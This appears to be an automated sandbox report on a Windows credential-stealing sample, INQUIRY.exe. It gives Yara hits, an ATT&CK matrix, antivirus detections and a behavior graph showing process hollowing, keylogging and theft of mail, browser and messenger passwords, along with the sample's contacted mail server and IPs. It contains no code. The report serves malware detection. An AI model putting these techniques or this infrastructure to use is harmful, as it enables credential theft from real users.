                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6776, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Replication Through Removable Media1Windows Management Instrumentation21DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsNative API11Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Input Capture211Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsShared Modules1Logon Script (Windows)Process Injection511Obfuscated Files or Information21Credentials in Registry2Account Discovery1SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing41Credentials In Files1File and Directory Discovery1Distributed Component Object ModelEmail Collection1Scheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery39SSHInput Capture211Data Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsQuery Registry1VNCClipboard Data3Exfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncSecurity Software Discovery1101Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion6Proc FilesystemVirtualization/Sandbox Evasion6Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection511/etc/passwd and /etc/shadowProcess Discovery3Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingApplication Window Discovery11Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Owner/User Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                    Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskMasquerade Task or ServiceGUI Input CaptureSystem Network Configuration Discovery1Exploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 319686 Sample: INQUIRY.exe Startdate: 18/11/2020 Architecture: WINDOWS Score: 100 94 121.205.6.0.in-addr.arpa 2->94 96 whatismyipaddress.com 2->96 124 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->124 126 Found malware configuration 2->126 128 Malicious sample detected (through community Yara rule) 2->128 130 10 other signatures 2->130 14 INQUIRY.exe 2->14         started        signatures3 process4 signatures5 172 Detected unpacking (changes PE section rights) 14->172 174 Detected unpacking (creates a PE file in dynamic memory) 14->174 176 Detected unpacking (overwrites its own PE header) 14->176 178 2 other signatures 14->178 17 INQUIRY.exe 14->17         started        19 INQUIRY.exe 15 6 14->19         started        process6 dnsIp7 23 INQUIRY.exe 17->23         started        98 mail.iigcest.com 166.62.27.57, 49750, 49774, 587 AS-26496-GO-DADDY-COM-LLCUS United States 19->98 100 121.205.6.0.in-addr.arpa 19->100 102 2 other IPs or domains 19->102 132 Changes the view of files in windows explorer (hidden files and folders) 19->132 134 Writes to foreign memory regions 19->134 136 Allocates memory in foreign processes 19->136 138 3 other signatures 19->138 26 vbc.exe 1 19->26         started        28 WerFault.exe 3 9 19->28         started        31 vbc.exe 13 19->31         started        33 dw20.exe 22 6 19->33         started        signatures8 process9 file10 154 Maps a DLL or memory area into another process 23->154 35 INQUIRY.exe 23->35         started        37 INQUIRY.exe 6 23->37         started        156 Tries to steal Mail credentials (via file registry) 26->156 158 Tries to steal Instant Messenger accounts or passwords 26->158 160 Tries to steal Mail credentials (via file access) 26->160 82 C:\ProgramData\Microsoft\...\WER1B59.tmp.mdmp, Mini 28->82 dropped 84 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 28->84 dropped signatures11 process12 dnsIp13 41 INQUIRY.exe 35->41         started        104 mail.iigcest.com 37->104 106 121.205.6.0.in-addr.arpa 37->106 108 whatismyipaddress.com 37->108 140 Writes to foreign memory regions 37->140 142 Allocates memory in foreign processes 37->142 144 Sample uses process hollowing technique 37->144 146 2 other signatures 37->146 44 vbc.exe 37->44         started        46 WerFault.exe 37->46         started        49 dw20.exe 37->49         started        51 vbc.exe 37->51         started        signatures14 process15 file16 164 Maps a DLL or memory area into another process 41->164 53 INQUIRY.exe 41->53         started        55 INQUIRY.exe 41->55         started        166 Tries to steal Instant Messenger accounts or passwords 44->166 168 Tries to steal Mail credentials (via file access) 44->168 86 C:\ProgramData\Microsoft\...\WERAB44.tmp.mdmp, Mini 46->86 dropped 88 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 46->88 dropped signatures17 process18 dnsIp19 59 INQUIRY.exe 53->59         started        110 121.205.6.0.in-addr.arpa 55->110 112 104.16.155.36, 443, 49777, 49778 CLOUDFLARENETUS United States 55->112 114 whatismyipaddress.com 55->114 162 Installs a global keyboard hook 55->162 62 dw20.exe 55->62         started        signatures20 process21 signatures22 170 Maps a DLL or memory area into another process 59->170 64 INQUIRY.exe 59->64         started        68 INQUIRY.exe 59->68         started        process23 dnsIp24 90 121.205.6.0.in-addr.arpa 64->90 92 whatismyipaddress.com 64->92 116 Writes to foreign memory regions 64->116 118 Allocates memory in foreign processes 64->118 120 Sample uses process hollowing technique 64->120 122 2 other signatures 64->122 70 vbc.exe 64->70         started        73 vbc.exe 64->73         started        75 WerFault.exe 64->75         started        78 dw20.exe 64->78         started        signatures25 process26 file27 148 Tries to steal Instant Messenger accounts or passwords 70->148 150 Tries to steal Mail credentials (via file access) 70->150 152 Tries to harvest and steal browser information (history, passwords, etc) 73->152 80 C:\ProgramData\Microsoft\...\WER7CAE.tmp.mdmp, Mini 75->80 dropped signatures28

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    INQUIRY.exe44%VirustotalBrowse
                    INQUIRY.exe42%ReversingLabsWin32.Trojan.Wacatac
                    INQUIRY.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    16.2.INQUIRY.exe.22e0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    32.2.INQUIRY.exe.2680000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    32.2.INQUIRY.exe.2680000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    16.1.INQUIRY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.2.INQUIRY.exe.21e0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    33.1.INQUIRY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.2.INQUIRY.exe.2270000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    1.2.INQUIRY.exe.2270000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    29.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    13.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    28.1.INQUIRY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    16.2.INQUIRY.exe.2370000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    16.2.INQUIRY.exe.2370000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    0.2.INQUIRY.exe.2640000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    0.2.INQUIRY.exe.2640000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    27.2.INQUIRY.exe.2640000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    27.2.INQUIRY.exe.2640000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    33.2.INQUIRY.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    33.2.INQUIRY.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    1.1.INQUIRY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    34.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    17.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    37.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                    6.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                    0.2.INQUIRY.exe.25f0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                    28.2.INQUIRY.exe.22f0000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    28.2.INQUIRY.exe.22f0000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    33.2.INQUIRY.exe.22f0000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    33.2.INQUIRY.exe.22f0000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    27.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    1.2.INQUIRY.exe.2300000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    1.2.INQUIRY.exe.2300000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    16.2.INQUIRY.exe.2490000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    16.2.INQUIRY.exe.2490000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    33.2.INQUIRY.exe.2210000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    28.2.INQUIRY.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    28.2.INQUIRY.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    13.2.INQUIRY.exe.2660000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    13.2.INQUIRY.exe.2660000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    33.2.INQUIRY.exe.2380000.3.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    33.2.INQUIRY.exe.2380000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    20.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                    2.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    32.2.INQUIRY.exe.2630000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                    28.2.INQUIRY.exe.7a0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    16.2.INQUIRY.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    16.2.INQUIRY.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    32.2.INQUIRY.exe.400000.0.unpack100%AviraHEUR/AGEN.1131223Download File
                    27.2.INQUIRY.exe.25e0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                    28.2.INQUIRY.exe.2240000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    28.2.INQUIRY.exe.2240000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    1.2.INQUIRY.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    1.2.INQUIRY.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    mail.iigcest.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.jiyu-kobo.co.jp/://w0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/typo0%Avira URL Cloudsafe
                    http://www.fontbureau.comsiv&0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/Treb0%Avira URL Cloudsafe
                    http://www.carterandcone.comandh0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp//0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.comepko0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/s/0%Avira URL Cloudsafe
                    http://www.fontbureau.comessed0%URL Reputationsafe
                    http://www.fontbureau.comessed0%URL Reputationsafe
                    http://www.fontbureau.comessed0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.carterandcone.com0p0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/cheV0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp/=0%Avira URL Cloudsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.carterandcone.comTCE0%Avira URL Cloudsafe
                    http://www.carterandcone.comits0%Avira URL Cloudsafe
                    http://www.carterandcone.comMic0%Avira URL Cloudsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fontbureau.comgrito0%URL Reputationsafe
                    http://www.fontbureau.comgrito0%URL Reputationsafe
                    http://www.fontbureau.comgrito0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.carterandcone.comTC(0%Avira URL Cloudsafe
                    http://www.carterandcone.como.0%URL Reputationsafe
                    http://www.carterandcone.como.0%URL Reputationsafe
                    http://www.carterandcone.como.0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.fontbureau.comTTFF0%Avira URL Cloudsafe
                    http://www.fontbureau.com=0%Avira URL Cloudsafe
                    http://www.carterandcone.comtig0%Avira URL Cloudsafe
                    http://www.galapagosdesign.com/0%URL Reputationsafe
                    http://www.galapagosdesign.com/0%URL Reputationsafe
                    http://www.galapagosdesign.com/0%URL Reputationsafe
                    http://www.fontbureau.comnc.0%Avira URL Cloudsafe
                    http://www.carterandcone.comTC0%URL Reputationsafe
                    http://www.carterandcone.comTC0%URL Reputationsafe
                    http://www.carterandcone.comTC0%URL Reputationsafe
                    http://go.microsoft.0%Avira URL Cloudsafe
                    http://go.microsoft.LinkId=421270%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    http://www.carterandcone.comn0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.comle0%Avira URL Cloudsafe
                    http://www.fontbureau.comk0%Avira URL Cloudsafe
                    http://www.fontbureau.comm=0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
                    http://www.fontbureau.comlvfet0%Avira URL Cloudsafe
                    http://www.fontbureau.coms0%Avira URL Cloudsafe
                    http://www.carterandcone.com$p0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    whatismyipaddress.com
                    		104.16.154.36
                    		truefalse
                      		high
                      mail.iigcest.com
                      		166.62.27.57
                      		truetrueunknown
                      121.205.6.0.in-addr.arpa
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://whatismyipaddress.com/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.jiyu-kobo.co.jp/://wINQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designersGINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/typoINQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.comsiv&INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://www.jiyu-kobo.co.jp/TrebINQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.carterandcone.comandhINQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/jp//INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tiro.comINQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersINQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comepkoINQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/s/INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comessedINQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.goodfont.co.krINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comINQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661195055.0000000005011000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.com0pINQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/cheVINQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designerslbINQUIRY.exe, 00000001.00000003.664066811.0000000005016000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/jp/=INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sajatypeworks.comINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/cTheINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
